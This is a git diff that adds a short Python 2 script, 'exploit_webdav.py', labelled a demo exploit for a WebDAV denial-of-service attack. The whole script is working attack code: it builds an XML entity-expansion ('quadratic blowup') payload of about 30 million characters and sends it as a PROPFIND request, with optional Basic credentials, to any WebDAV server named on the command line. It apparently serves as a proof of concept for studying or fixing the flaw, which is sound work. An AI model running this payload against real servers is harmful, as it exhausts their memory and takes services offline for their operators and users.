diff options
Diffstat (limited to 'other/exploit_webdav.py')
| -rwxr-xr-x | other/exploit_webdav.py | 44 |
1 files changed, 44 insertions, 0 deletions
diff --git a/other/exploit_webdav.py b/other/exploit_webdav.py new file mode 100755 index 0000000..3288c28 --- /dev/null +++ b/other/exploit_webdav.py @@ -0,0 +1,44 @@ +#!/usr/bin/python +"""Demo exploit for WebDAV DoS attack + +Author: Christian Heimes +""" +import sys +import base64 +import urlparse +import httplib + +if len(sys.argv) != 2: + sys.exit("{} http://user:password@host:port/".format(sys.argv[0])) + +url = urlparse.urlparse(sys.argv[1]) + +xml = """<?xml version='1.0'?> +<!DOCTYPE bomb [ +<!ENTITY a "VALUE"> +]> + <propfind xmlns="DAV:"> + <prop>QUAD + <supported-live-property-set/> + <supported-method-set/> + </prop> +</propfind> +""" + +xml = xml.replace("VALUE", "a" * 30000) +xml = xml.replace("QUAD", "&a;" * 1000) + +headers = { + "Content-Type": "text/xml", + "Content-Length": len(xml), + "Depth": 1, + } + +if url.username: + auth = base64.b64encode(":".join((url.username, url.password))) + headers["Authorization"] = "Basic %s" % auth + +con = httplib.HTTPConnection(url.hostname, int(url.port)) +con.request("PROPFIND", url.path, body=xml, headers=headers) +res = con.getresponse() +print(res.read()) |